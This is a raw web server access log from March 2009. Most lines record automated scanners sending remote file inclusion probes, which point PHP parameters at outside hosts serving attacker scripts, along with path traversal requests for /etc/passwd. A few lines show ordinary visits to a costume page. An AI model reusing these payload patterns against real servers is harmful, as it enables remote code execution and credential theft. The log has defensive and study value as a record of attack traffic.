91.52.190.23 - - [12/Mar/2009:22:39:58 -0500] "GET //includes/user_confirmation.inc.php?include_path=http://www.madolddogs.de//flash/db/id2.txt?? HTTP/1.1" 404 319 "-""libwww-perl/5.805"
210.118.170.11 - - [12/Mar/2009:22:40:04 -0500] "GET /logs/errors.php?error=http://www.lazar.ru/manager/processors/copyright.txt?? HTTP/1.1" 404 299 "-""libwww-perl/5.805"
77.221.130.15 - - [12/Mar/2009:22:40:25 -0500] "GET /logs/access_log.1216684800/appserv/main.php?appserv_root=http://www.lazar.ru/manager/processors/readme.txt?? HTTP/1.1" 404 327 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1"
80.67.26.159 - - [12/Mar/2009:22:40:29 -0500] "GET //components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://roadone.net//board/data/photo/db/fatal1.txt???? HTTP/1.1" 404 328 "-""Mozilla/5.0"
80.67.26.159 - - [12/Mar/2009:22:40:29 -0500] "GET /logs/access_log.1217116800%20%20//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://roadone.net//board/data/photo/db/fatal1.txt???? HTTP/1.1" 404 357 "-""Mozilla/5.0"
80.67.26.159 - - [12/Mar/2009:22:40:29 -0500] "GET /logs//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://roadone.net//board/data/photo/db/fatal1.txt???? HTTP/1.1" 404 333 "-""Mozilla/5.0"
206.123.122.148 - - [12/Mar/2009:22:40:49 -0500] "GET /logs/access_log.1209686400/ask_password.php?dir=http://www.outbreak.castnet.org.au/safe.txt??? HTTP/1.1" 404 327 "-""libwww-perl/5.65"
147.83.175.41 - - [12/Mar/2009:22:40:50 -0500] "GET /logs/access_log.1217030400//index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 321 "-""libwww-perl/5.805"
147.83.175.41 - - [12/Mar/2009:22:41:43 -0500] "GET /logs/access_log.1220572800//index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 321 "-""libwww-perl/5.805"
147.83.175.41 - - [12/Mar/2009:22:41:44 -0500] "GET /logs/access_log.1215734400//index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 321 "-""libwww-perl/5.805"
69.43.201.9 - - [12/Mar/2009:22:41:50 -0500] "GET /logs/errors.php?error=http://www.aercoppo.it//assets/snippets/reflect/fx29id1.txt? HTTP/1.1" 404 299 "-""Mozilla/5.0"
69.43.201.9 - - [12/Mar/2009:22:41:50 -0500] "GET /logs/access_log.1217116800/errors.php?error=http://www.aercoppo.it//assets/snippets/reflect/fx29id1.txt? HTTP/1.1" 404 321 "-""Mozilla/5.0"
69.43.201.9 - - [12/Mar/2009:22:41:50 -0500] "GET /errors.php?error=http://www.aercoppo.it//assets/snippets/reflect/fx29id1.txt? HTTP/1.1" 404 294 "-""Mozilla/5.0"
211.220.195.71 - - [12/Mar/2009:22:42:21 -0500] "GET //index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://zacs.ca/blm/images/banner.gif?? HTTP/1.1" 404 294 "-""Mozilla/5.0"
211.220.195.71 - - [12/Mar/2009:22:42:21 -0500] "GET /logs//index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://zacs.ca/blm/images/banner.gif?? HTTP/1.1" 404 299 "-""Mozilla/5.0"
211.220.195.71 - - [12/Mar/2009:22:42:21 -0500] "GET /logs/access_log.1217116800%20%20//index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://zacs.ca/blm/images/banner.gif?? HTTP/1.1" 404 323 "-""Mozilla/5.0"
211.220.195.71 - - [12/Mar/2009:22:42:42 -0500] "GET /logs/access_log.1211932800%20%20//index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://zacs.ca/blm/images/banner.gif?? HTTP/1.1" 404 323 "-""Mozilla/5.0"
67.222.129.18 - - [12/Mar/2009:22:42:51 -0500] "GET /logs/access_log.1219536000//components/com_simpleboard/image_upload.php?sbp=http://www.arayam.com/livechat/id1.txt?? HTTP/1.1" 404 355 "-""Mozilla/5.0"
67.222.129.18 - - [12/Mar/2009:22:42:51 -0500] "GET //components/com_simpleboard/image_upload.php?sbp=http://www.arayam.com/livechat/id1.txt?? HTTP/1.1" 404 328 "-""Mozilla/5.0"
67.222.129.18 - - [12/Mar/2009:22:42:51 -0500] "GET /logs//components/com_simpleboard/image_upload.php?sbp=http://www.arayam.com/livechat/id1.txt?? HTTP/1.1" 404 333 "-""Mozilla/5.0"
206.123.122.148 - - [12/Mar/2009:22:43:15 -0500] "GET /logs/ask_password.php?dir=http://www.outbreak.castnet.org.au/safe.txt??? HTTP/1.1" 404 305 "-""libwww-perl/5.65"
206.123.122.148 - - [12/Mar/2009:22:43:15 -0500] "GET /ask_password.php?dir=http://www.outbreak.castnet.org.au/safe.txt??? HTTP/1.1" 404 300 "-""libwww-perl/5.65"
80.67.26.159 - - [12/Mar/2009:22:43:24 -0500] "GET /logs/access_log.1211414400//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://roadone.net//board/data/photo/db/fatal1.txt???? HTTP/1.1" 404 355 "-""Mozilla/5.0"
80.67.26.159 - - [12/Mar/2009:22:43:49 -0500] "GET /logs/access_log.1217116800//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://roadone.net//board/data/photo/db/fatal1.txt???? HTTP/1.1" 404 355 "-""Mozilla/5.0"
211.220.195.71 - - [12/Mar/2009:22:44:07 -0500] "GET /logs/access_log.1216684800//index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://zacs.ca/blm/images/banner.gif?? HTTP/1.1" 404 321 "-""Mozilla/5.0"
211.220.195.71 - - [12/Mar/2009:22:44:07 -0500] "GET /logs/access_log.1211932800//index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://zacs.ca/blm/images/banner.gif?? HTTP/1.1" 404 321 "-""Mozilla/5.0"
91.52.190.23 - - [12/Mar/2009:22:44:07 -0500] "GET //includes/converter.inc.php?include_path=http://www.madolddogs.de//flash/db/id2.txt?? HTTP/1.1" 404 311 "-""libwww-perl/5.805"
91.52.190.23 - - [12/Mar/2009:22:44:07 -0500] "GET /logs//includes/converter.inc.php?include_path=http://www.madolddogs.de//flash/db/id2.txt?? HTTP/1.1" 404 316 "-""libwww-perl/5.805"
72.30.142.163 - - [12/Mar/2009:22:44:45 -0500] "GET /logs/access_log.1201824000 HTTP/1.0" 200 238885 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
91.52.190.23 - - [12/Mar/2009:22:44:54 -0500] "GET /logs//includes/converter.inc.php?include_path=http://www.madolddogs.de//flash/db/id2.txt?? HTTP/1.1" 404 316 "-""libwww-perl/5.805"
91.52.190.23 - - [12/Mar/2009:22:44:54 -0500] "GET //includes/converter.inc.php?include_path=http://www.madolddogs.de//flash/db/id2.txt?? HTTP/1.1" 404 311 "-""libwww-perl/5.805"
61.62.162.42 - - [12/Mar/2009:22:46:54 -0500] "GET //index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://zacs.ca/blm/images/banner.jpg?? HTTP/1.1" 404 294 "-""libwww-perl/5.803"
148.202.29.8 - - [12/Mar/2009:22:47:32 -0500] "GET /logs/access_log.1217289600//newspublish/samplenewspublish.php?path[docroot]=http://star.jbsc.ac.kr/technote/config/menu/id.txt? HTTP/1.1" 404 345 "-""libwww-perl/5.803"
148.202.29.8 - - [12/Mar/2009:22:47:33 -0500] "GET //newspublish/samplenewspublish.php?path[docroot]=http://star.jbsc.ac.kr/technote/config/menu/id.txt? HTTP/1.1" 404 318 "-""libwww-perl/5.803"
148.202.29.8 - - [12/Mar/2009:22:47:33 -0500] "GET /logs//newspublish/samplenewspublish.php?path[docroot]=http://star.jbsc.ac.kr/technote/config/menu/id.txt? HTTP/1.1" 404 323 "-""libwww-perl/5.803"
211.43.205.222 - - [12/Mar/2009:22:48:42 -0500] "GET /logs/access_log.1217289600/?DOCUMENT_ROOT=http://gumansin.com/id.txt?? HTTP/1.1" 404 311 "-""Mozilla/5.0"
211.43.205.222 - - [12/Mar/2009:22:48:42 -0500] "GET /?DOCUMENT_ROOT=http://gumansin.com/id.txt?? HTTP/1.1" 200 1243 "-""Mozilla/5.0"
211.43.205.222 - - [12/Mar/2009:22:48:44 -0500] "GET /logs/?DOCUMENT_ROOT=http://gumansin.com/id.txt?? HTTP/1.1" 200 122039 "-""Mozilla/5.0"
211.43.205.222 - - [12/Mar/2009:22:48:48 -0500] "GET /logs/access_log.1225929600/?DOCUMENT_ROOT=http://gumansin.com/id.txt?? HTTP/1.1" 404 311 "-""Mozilla/5.0"
212.117.165.14 - - [12/Mar/2009:22:49:01 -0500] "GET /logs//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://securessh.t35.com/id.txt??? HTTP/1.1" 404 341 "-""libwww-perl/5.824"
212.117.165.14 - - [12/Mar/2009:22:49:01 -0500] "GET //include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://securessh.t35.com/id.txt??? HTTP/1.1" 404 336 "-""libwww-perl/5.824"
85.18.117.101 - - [12/Mar/2009:22:49:17 -0500] "GET /logs//index.php?DOCUMENT_ROOT=http://kbapt.co.kr/bbs/templates/id1.txt? HTTP/1.1" 404 299 "-""Mozilla/5.0"
85.18.117.101 - - [12/Mar/2009:22:49:17 -0500] "GET /logs/access_log.1216684800//index.php?DOCUMENT_ROOT=http://kbapt.co.kr/bbs/templates/id1.txt? HTTP/1.1" 404 321 "-""Mozilla/5.0"
85.18.117.101 - - [12/Mar/2009:22:49:17 -0500] "GET //index.php?DOCUMENT_ROOT=http://kbapt.co.kr/bbs/templates/id1.txt? HTTP/1.1" 404 294 "-""Mozilla/5.0"
217.106.235.128 - - [12/Mar/2009:22:50:38 -0500] "GET /logs/access_log.1219536000/upgrade_album.php?GALLERY_BASEDIR=http://www.outbreak.castnet.org.au/safe.txt??? HTTP/1.0" 404 316 "-""libwww-perl/5.53"
217.106.235.128 - - [12/Mar/2009:22:50:43 -0500] "GET /upgrade_album.php?GALLERY_BASEDIR=http://www.outbreak.castnet.org.au/safe.txt??? HTTP/1.0" 404 289 "-""libwww-perl/5.53"
217.106.235.128 - - [12/Mar/2009:22:50:43 -0500] "GET /logs/upgrade_album.php?GALLERY_BASEDIR=http://www.outbreak.castnet.org.au/safe.txt??? HTTP/1.0" 404 294 "-""libwww-perl/5.53"
61.62.162.42 - - [12/Mar/2009:22:50:46 -0500] "GET /logs/access_log.1216684800//index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://zacs.ca/blm/images/banner.jpg?? HTTP/1.1" 404 321 "-""libwww-perl/5.803"
61.62.162.42 - - [12/Mar/2009:22:50:47 -0500] "GET //index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://zacs.ca/blm/images/banner.jpg?? HTTP/1.1" 404 294 "-""libwww-perl/5.803"
61.62.162.42 - - [12/Mar/2009:22:50:48 -0500] "GET /logs//index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://zacs.ca/blm/images/banner.jpg?? HTTP/1.1" 404 299 "-""libwww-perl/5.803"
83.17.183.214 - - [12/Mar/2009:22:50:51 -0500] "GET /logs/access_log.1217289600//bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://indoirc.go.ro/idB.txt?? HTTP/1.1" 404 337 "-""libwww-perl/5.65"
216.15.161.2 - - [12/Mar/2009:22:51:09 -0500] "GET //index.php?DOCUMENT_ROOT=http://lotmos.ru//prog/pl_rubrikator/id1.txt?? HTTP/1.1" 404 294 "-""Mozilla/5.0"
216.15.161.2 - - [12/Mar/2009:22:51:09 -0500] "GET /logs/access_log.1216684800//index.php?DOCUMENT_ROOT=http://lotmos.ru//prog/pl_rubrikator/id1.txt?? HTTP/1.1" 404 321 "-""Mozilla/5.0"
216.15.161.2 - - [12/Mar/2009:22:51:09 -0500] "GET /logs//index.php?DOCUMENT_ROOT=http://lotmos.ru//prog/pl_rubrikator/id1.txt?? HTTP/1.1" 404 299 "-""Mozilla/5.0"
216.15.161.2 - - [12/Mar/2009:22:51:10 -0500] "GET //index.php?DOCUMENT_ROOT=http://lotmos.ru//prog/pl_rubrikator/id1.txt?? HTTP/1.1" 404 294 "-""Mozilla/5.0"
216.15.161.2 - - [12/Mar/2009:22:51:10 -0500] "GET /logs/access_log.1216684800//index.php?DOCUMENT_ROOT=http://lotmos.ru//prog/pl_rubrikator/id1.txt?? HTTP/1.1" 404 321 "-""Mozilla/5.0"
216.15.161.2 - - [12/Mar/2009:22:51:10 -0500] "GET /logs//index.php?DOCUMENT_ROOT=http://lotmos.ru//prog/pl_rubrikator/id1.txt?? HTTP/1.1" 404 299 "-""Mozilla/5.0"
61.62.162.42 - - [12/Mar/2009:22:51:18 -0500] "GET /logs/access_log.1211932800//index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://zacs.ca/blm/images/banner.jpg?? HTTP/1.1" 404 321 "-""libwww-perl/5.803"
69.43.201.9 - - [12/Mar/2009:22:51:18 -0500] "GET /logs/access_log.1225929600/?DOCUMENT_ROOT=http://www.aercoppo.it//assets/snippets/reflect/fx29id1.txt? HTTP/1.1" 404 311 "-""Mozilla/5.0"
77.221.130.2 - - [12/Mar/2009:22:52:13 -0500] "GET /logs/access_log.1205366400//faqsupport/samplefaqsupport.php?path[docroot]=http://www.lazar.ru/manager/processors/readme.txt?? HTTP/1.1" 404 343 "-""Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.1; Windows NT 5.1;)"
77.221.130.2 - - [12/Mar/2009:22:52:13 -0500] "GET /logs//faqsupport/samplefaqsupport.php?path[docroot]=http://www.lazar.ru/manager/processors/readme.txt?? HTTP/1.1" 404 321 "-""Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.1; Windows NT 5.1;)"
77.221.130.2 - - [12/Mar/2009:22:52:13 -0500] "GET //faqsupport/samplefaqsupport.php?path[docroot]=http://www.lazar.ru/manager/processors/readme.txt?? HTTP/1.1" 404 316 "-""Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.1; Windows NT 5.1;)"
85.18.117.101 - - [12/Mar/2009:22:52:25 -0500] "GET /logs/access_log.1217289600//index.php?DOCUMENT_ROOT=http://kbapt.co.kr/bbs/templates/id1.txt? HTTP/1.1" 404 321 "-""Mozilla/5.0"
77.221.130.2 - - [12/Mar/2009:22:52:30 -0500] "GET /logs/access_log.1205366400//faqsupport/samplefaqsupport.php?path[docroot]=http://www.lazar.ru/manager/processors/readme.txt?? HTTP/1.1" 404 343 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1"
77.221.130.2 - - [12/Mar/2009:22:52:30 -0500] "GET //faqsupport/samplefaqsupport.php?path[docroot]=http://www.lazar.ru/manager/processors/readme.txt?? HTTP/1.1" 404 316 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1"
77.221.130.2 - - [12/Mar/2009:22:52:30 -0500] "GET /logs//faqsupport/samplefaqsupport.php?path[docroot]=http://www.lazar.ru/manager/processors/readme.txt?? HTTP/1.1" 404 321 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1"
78.89.95.12 - - [12/Mar/2009:22:52:37 -0500] "GET /costume/ HTTP/1.1" 200 640 "http://en.wikipedia.org/wiki/Costume""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; InfoPath.2)"
78.89.95.12 - - [12/Mar/2009:22:52:38 -0500] "GET /favicon.ico HTTP/1.1" 404 295 "-""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; InfoPath.2)"
77.221.130.2 - - [12/Mar/2009:22:52:40 -0500] "GET /logs/access_log.1210550400//faqsupport/samplefaqsupport.php?path[docroot]=http://www.lazar.ru/manager/processors/readme.txt?? HTTP/1.1" 404 343 "-""Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.1; Windows NT 5.1;)"
78.89.95.12 - - [12/Mar/2009:22:52:43 -0500] "GET /costume/costume1.htm HTTP/1.1" 200 4913 "http://tomdolan.pconline.com/costume/""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; InfoPath.2)"
78.89.95.12 - - [12/Mar/2009:22:52:44 -0500] "GET /costume/enter1.gif HTTP/1.1" 200 22826 "http://tomdolan.pconline.com/costume/costume1.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; InfoPath.2)"
78.89.95.12 - - [12/Mar/2009:22:52:45 -0500] "GET /costume/costm_a.JPG HTTP/1.1" 200 61141 "http://tomdolan.pconline.com/costume/costume1.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; InfoPath.2)"
78.89.95.12 - - [12/Mar/2009:22:52:45 -0500] "GET /costume/history5.gif HTTP/1.1" 200 4380 "http://tomdolan.pconline.com/costume/costume1.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; InfoPath.2)"
77.221.130.2 - - [12/Mar/2009:22:52:47 -0500] "GET /logs/access_log.1210550400//faqsupport/samplefaqsupport.php?path[docroot]=http://www.lazar.ru/manager/processors/readme.txt?? HTTP/1.1" 404 343 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1"
77.221.130.15 - - [12/Mar/2009:22:52:50 -0500] "GET /logs/access_log.1205366400//faqsupport/samplefaqsupport.php?path[docroot]=http://www.lazar.ru/manager/processors/readme.txt?? HTTP/1.1" 404 343 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1"
77.221.130.15 - - [12/Mar/2009:22:52:51 -0500] "GET //faqsupport/samplefaqsupport.php?path[docroot]=http://www.lazar.ru/manager/processors/readme.txt?? HTTP/1.1" 404 316 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1"
77.221.130.15 - - [12/Mar/2009:22:52:53 -0500] "GET /logs//faqsupport/samplefaqsupport.php?path[docroot]=http://www.lazar.ru/manager/processors/readme.txt?? HTTP/1.1" 404 321 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1"
78.89.95.12 - - [12/Mar/2009:22:53:04 -0500] "GET /costume/costume2.htm HTTP/1.1" 200 1810 "http://tomdolan.pconline.com/costume/costume1.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; InfoPath.2)"
77.221.130.15 - - [12/Mar/2009:22:53:08 -0500] "GET //faqsupport/samplefaqsupport.php?path[docroot]=http://www.lazar.ru/manager/processors/readme.txt?? HTTP/1.1" 404 316 "-""Mozilla/4.61 (Macintosh; I; PPC)"
77.221.130.15 - - [12/Mar/2009:22:53:08 -0500] "GET /logs/access_log.1205366400//faqsupport/samplefaqsupport.php?path[docroot]=http://www.lazar.ru/manager/processors/readme.txt?? HTTP/1.1" 404 343 "-""Mozilla/4.61 (Macintosh; I; PPC)"
77.221.130.15 - - [12/Mar/2009:22:53:08 -0500] "GET /logs//faqsupport/samplefaqsupport.php?path[docroot]=http://www.lazar.ru/manager/processors/readme.txt?? HTTP/1.1" 404 321 "-""Mozilla/4.61 (Macintosh; I; PPC)"
216.15.161.2 - - [12/Mar/2009:22:53:10 -0500] "GET /logs/access_log.1217289600//index.php?DOCUMENT_ROOT=http://lotmos.ru//prog/pl_rubrikator/id1.txt?? HTTP/1.1" 404 321 "-""Mozilla/5.0"
216.15.161.2 - - [12/Mar/2009:22:53:16 -0500] "GET /logs/access_log.1217289600//index.php?DOCUMENT_ROOT=http://lotmos.ru//prog/pl_rubrikator/id1.txt?? HTTP/1.1" 404 321 "-""Mozilla/5.0"
78.89.95.12 - - [12/Mar/2009:22:53:22 -0500] "GET /costume/index1.htm HTTP/1.1" 200 21563 "http://tomdolan.pconline.com/costume/costume2.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; InfoPath.2)"
77.221.130.15 - - [12/Mar/2009:22:53:33 -0500] "GET /logs/access_log.1210550400//faqsupport/samplefaqsupport.php?path[docroot]=http://www.lazar.ru/manager/processors/readme.txt?? HTTP/1.1" 404 343 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1"
77.221.130.15 - - [12/Mar/2009:22:53:41 -0500] "GET /logs/access_log.1210550400//faqsupport/samplefaqsupport.php?path[docroot]=http://www.lazar.ru/manager/processors/readme.txt?? HTTP/1.1" 404 343 "-""Mozilla/4.61 (Macintosh; I; PPC)"
78.89.95.12 - - [12/Mar/2009:22:53:47 -0500] "GET /costume/thmb1.htm HTTP/1.1" 200 3799 "http://tomdolan.pconline.com/costume/index1.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; InfoPath.2)"
78.89.95.12 - - [12/Mar/2009:22:53:48 -0500] "GET /costume/costm2.jpg HTTP/1.1" 200 36199 "http://tomdolan.pconline.com/costume/thmb1.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; InfoPath.2)"
78.89.95.12 - - [12/Mar/2009:22:53:49 -0500] "GET /costume/costm3.jpg HTTP/1.1" 200 39529 "http://tomdolan.pconline.com/costume/thmb1.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; InfoPath.2)"
78.89.95.12 - - [12/Mar/2009:22:53:50 -0500] "GET /costume/costm1.jpg HTTP/1.1" 200 59753 "http://tomdolan.pconline.com/costume/thmb1.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; InfoPath.2)"
78.89.95.12 - - [12/Mar/2009:22:53:50 -0500] "GET /costume/costm4.jpg HTTP/1.1" 200 36814 "http://tomdolan.pconline.com/costume/thmb1.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; InfoPath.2)"
78.89.95.12 - - [12/Mar/2009:22:53:50 -0500] "GET /costume/costm5.jpg HTTP/1.1" 200 36546 "http://tomdolan.pconline.com/costume/thmb1.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; InfoPath.2)"
78.89.95.12 - - [12/Mar/2009:22:53:51 -0500] "GET /costume/costm6.jpg HTTP/1.1" 200 39194 "http://tomdolan.pconline.com/costume/thmb1.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; InfoPath.2)"
78.89.95.12 - - [12/Mar/2009:22:53:51 -0500] "GET /costume/costm7.jpg HTTP/1.1" 200 35141 "http://tomdolan.pconline.com/costume/thmb1.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; InfoPath.2)"
78.89.95.12 - - [12/Mar/2009:22:53:52 -0500] "GET /costume/costm8.jpg HTTP/1.1" 200 35448 "http://tomdolan.pconline.com/costume/thmb1.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; InfoPath.2)"
78.89.95.12 - - [12/Mar/2009:22:53:52 -0500] "GET /costume/costm9.jpg HTTP/1.1" 200 38021 "http://tomdolan.pconline.com/costume/thmb1.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; InfoPath.2)"
78.89.95.12 - - [12/Mar/2009:22:53:52 -0500] "GET /costume/costm10.jpg HTTP/1.1" 200 60187 "http://tomdolan.pconline.com/costume/thmb1.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; InfoPath.2)"
78.89.95.12 - - [12/Mar/2009:22:53:53 -0500] "GET /costume/costm11.jpg HTTP/1.1" 200 37363 "http://tomdolan.pconline.com/costume/thmb1.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; InfoPath.2)"
78.89.95.12 - - [12/Mar/2009:22:53:54 -0500] "GET /costume/costm12.jpg HTTP/1.1" 200 35291 "http://tomdolan.pconline.com/costume/thmb1.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; InfoPath.2)"
85.18.117.101 - - [12/Mar/2009:22:53:56 -0500] "GET /logs/access_log.1216684800%20%20//index.php?DOCUMENT_ROOT=http://kbapt.co.kr/bbs/templates/id1.txt? HTTP/1.1" 404 323 "-""Mozilla/5.0"
210.118.170.11 - - [12/Mar/2009:22:54:54 -0500] "GET /logs/access_log.1216512000/lostpasswd.php?env[include_prefix]=http://www.lazar.ru/manager/processors/copyright.txt?? HTTP/1.1" 404 325 "-""libwww-perl/5.805"
210.118.170.11 - - [12/Mar/2009:22:54:55 -0500] "GET /lostpasswd.php?env[include_prefix]=http://www.lazar.ru/manager/processors/copyright.txt?? HTTP/1.1" 404 298 "-""libwww-perl/5.805"
210.118.170.11 - - [12/Mar/2009:22:55:00 -0500] "GET /logs/lostpasswd.php?env[include_prefix]=http://www.lazar.ru/manager/processors/copyright.txt?? HTTP/1.1" 404 303 "-""libwww-perl/5.805"
216.15.161.2 - - [12/Mar/2009:22:55:11 -0500] "GET /logs/access_log.1216684800%20%20//index.php?DOCUMENT_ROOT=http://lotmos.ru//prog/pl_rubrikator/id1.txt?? HTTP/1.1" 404 323 "-""Mozilla/5.0"
216.15.161.2 - - [12/Mar/2009:22:55:12 -0500] "GET /logs/access_log.1216684800%20%20//index.php?DOCUMENT_ROOT=http://lotmos.ru//prog/pl_rubrikator/id1.txt?? HTTP/1.1" 404 323 "-""Mozilla/5.0"
202.125.46.29 - - [12/Mar/2009:22:55:13 -0500] "GET /logs//index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://zacs.ca/blm/images/banner.gif?? HTTP/1.1" 404 299 "-""Mozilla/5.0"
202.125.46.29 - - [12/Mar/2009:22:55:13 -0500] "GET //index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://zacs.ca/blm/images/banner.gif?? HTTP/1.1" 404 294 "-""Mozilla/5.0"
202.125.46.29 - - [12/Mar/2009:22:55:13 -0500] "GET /logs/access_log.1217116800%20%20//index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://zacs.ca/blm/images/banner.gif?? HTTP/1.1" 404 323 "-""Mozilla/5.0"
218.38.12.178 - - [12/Mar/2009:22:55:36 -0500] "GET /logs/access_log.1216512000//bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://zinc.free-site-host.com/v6zid.txt??? HTTP/1.1" 404 337 "-""libwww-perl/5.805"
218.38.12.178 - - [12/Mar/2009:22:55:36 -0500] "GET //bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://zinc.free-site-host.com/v6zid.txt??? HTTP/1.1" 404 310 "-""libwww-perl/5.805"
218.38.12.178 - - [12/Mar/2009:22:55:36 -0500] "GET /logs//bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://zinc.free-site-host.com/v6zid.txt??? HTTP/1.1" 404 315 "-""libwww-perl/5.805"
91.121.112.152 - - [12/Mar/2009:22:55:41 -0500] "GET /logs/access_log.1226793600/?sourcedir=../../../../../../../../../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 311 "-""libwww-perl/5.803"
91.121.112.152 - - [12/Mar/2009:22:55:41 -0500] "GET /logs/access_log.1219536000/?sourcedir=../../../../../../../../../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 311 "-""libwww-perl/5.803"
91.121.112.152 - - [12/Mar/2009:22:55:41 -0500] "GET /?sourcedir=../../../../../../../../../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 200 1243 "-""libwww-perl/5.803"
85.18.117.101 - - [12/Mar/2009:22:55:41 -0500] "GET /logs/access_log.1217289600%20%20//index.php?DOCUMENT_ROOT=http://kbapt.co.kr/bbs/templates/id1.txt? HTTP/1.1" 404 323 "-""Mozilla/5.0"
91.121.112.152 - - [12/Mar/2009:22:55:42 -0500] "GET /logs/?sourcedir=../../../../../../../../../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 200 122039 "-""libwww-perl/5.803"
202.125.46.29 - - [12/Mar/2009:22:55:56 -0500] "GET /logs/access_log.1211932800%20%20//index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://zacs.ca/blm/images/banner.gif?? HTTP/1.1" 404 323 "-""Mozilla/5.0"
148.202.29.8 - - [12/Mar/2009:22:56:02 -0500] "GET //newspublish/samplenewspublish.php?path[docroot]=http://star.jbsc.ac.kr/technote/config/menu/id.txt? HTTP/1.1" 404 318 "-""libwww-perl/5.803"
216.15.161.2 - - [12/Mar/2009:22:56:14 -0500] "GET /logs/access_log.1217289600%20%20//index.php?DOCUMENT_ROOT=http://lotmos.ru//prog/pl_rubrikator/id1.txt?? HTTP/1.1" 404 323 "-""Mozilla/5.0"
216.15.161.2 - - [12/Mar/2009:22:56:17 -0500] "GET /logs/access_log.1217289600%20%20//index.php?DOCUMENT_ROOT=http://lotmos.ru//prog/pl_rubrikator/id1.txt?? HTTP/1.1" 404 323 "-""Mozilla/5.0"
202.125.46.29 - - [12/Mar/2009:22:56:53 -0500] "GET /logs/access_log.1216684800//index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://zacs.ca/blm/images/banner.gif?? HTTP/1.1" 404 321 "-""Mozilla/5.0"
